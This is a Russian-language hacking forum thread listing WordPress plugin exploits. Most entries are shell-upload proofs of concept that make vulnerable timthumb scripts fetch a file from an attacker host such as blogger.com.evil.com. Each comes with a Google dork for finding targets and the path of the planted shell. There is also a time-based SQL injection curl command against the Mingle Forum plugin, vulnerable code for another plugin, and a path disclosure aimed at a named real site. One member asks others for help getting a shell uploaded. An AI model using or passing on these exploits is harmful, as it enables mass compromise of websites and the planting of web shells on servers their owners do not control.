The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php
# Plugin: Category List Portfolio Page Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-list-portfolio-page
# Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/
# Version: 0.9
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php
# Plugin: Really Easy Slider Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/really-easy-slider
# Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/
# Version: 0.1
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php
# Plugin: Verve Meta Boxes Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/verve-meta-boxes
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/
# Version: 1.2.8
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php
# Plugin: User Avatar Wordpress plugin shell upload vulnerability
# Google Dork: inurl:wp-content/plugins/user-avatar
# Software Link: http://wordpress.org/extend/plugins/user-avatar/download/
# Version: 1.3.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php
Requires register_globals to be enabled and at least one user account to have an avatar directory.
The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php
# Plugin: Extend Wordpress Wordpress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/extend-wordpress
# Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/
# Version: 1.3.7
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL
The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php
|
|
|
|
13.10.2011, 20:49
|
|
Новичок
Регистрация: 19.05.2011
Сообщений: 26
С нами:
7886486
Репутация:
-1
|
|
Код:
# Exploit Title: WordPress Mingle Forum plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
e.g.
curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php
---------------
Vulnerable code
---------------
if (!isset($_POST['edit_post_submit'])) {
$errormsg = apply_filters('wpwf_check_guestinfo',"");
if ($errormsg != "") {
$error = true;
wp_die($errormsg);
}
}
if($options['forum_captcha'] == true && !$user_ID){
include_once(WPFPATH."captcha/shared.php");
$wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail"
if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {
// do nothing
}
else {
$error = true;
$msg = __("Security code does not match", "mingleforum");
wp_die($msg);
}
}
...
if(isset($_POST['edit_post_submit'])){
$myReplaceSub = array("'", "\\");
$subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject']));
$content = $mingleforum->input_filter($_POST['message']);
$thread = $mingleforum->check_parms($_POST['thread_id']);
$edit_post_id = $_POST['edit_post_id'];
if($subject == ""){
$msg .= "".__("An error occured", "mingleforum")."";
$msg .= ("".__("You must enter a subject", "mingleforum")."");
$error = true;
}
elseif($content == ""){
$msg .= "".__("An error occured", "mingleforum")."";
$msg .= ("".__("You must enter a message", "mingleforum")."");
$error = true;
}
if ($error) wp_die($msg);
//SECURITY FIX NEEDED t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id");
$wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)
|
|
|
|
13.10.2011, 20:55
|
|
Новичок
Регистрация: 19.05.2011
Сообщений: 26
С нами:
7886486
Репутация:
-1
|
|
[B]WordPress Collision Testimonials plugin 1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11 2))),0)
---------------
Vulnerable code
---------------
if (isset($_GET['featQuote'])) {
$id = $_GET['id'];
mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id");
};
[/CODE]
|
|
|
|
19.10.2011, 02:14
|
|
Участник форума
Регистрация: 31.03.2008
Сообщений: 160
С нами:
9533780
Репутация:
97
|
|
Кто нибудь крутил вот эту скулю? Я так и не смог шелл залить, может у кого пройдёт отпишите.. |
|
|
|
19.10.2011, 21:03
|
|
Новичок
Регистрация: 27.07.2010
Сообщений: 0
С нами:
8312726
Репутация:
0
|
|
TUBEPRESS
Раскрытие путей в Wordpress в плагине Tubepress
sait.com/wp-content/plugins/tubepress/classes/org/tubepress/cache/
Код:
пример: http://www.slapapp.com/wp-content/plugins/tubepress/classes/org/tubepress/cache/
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
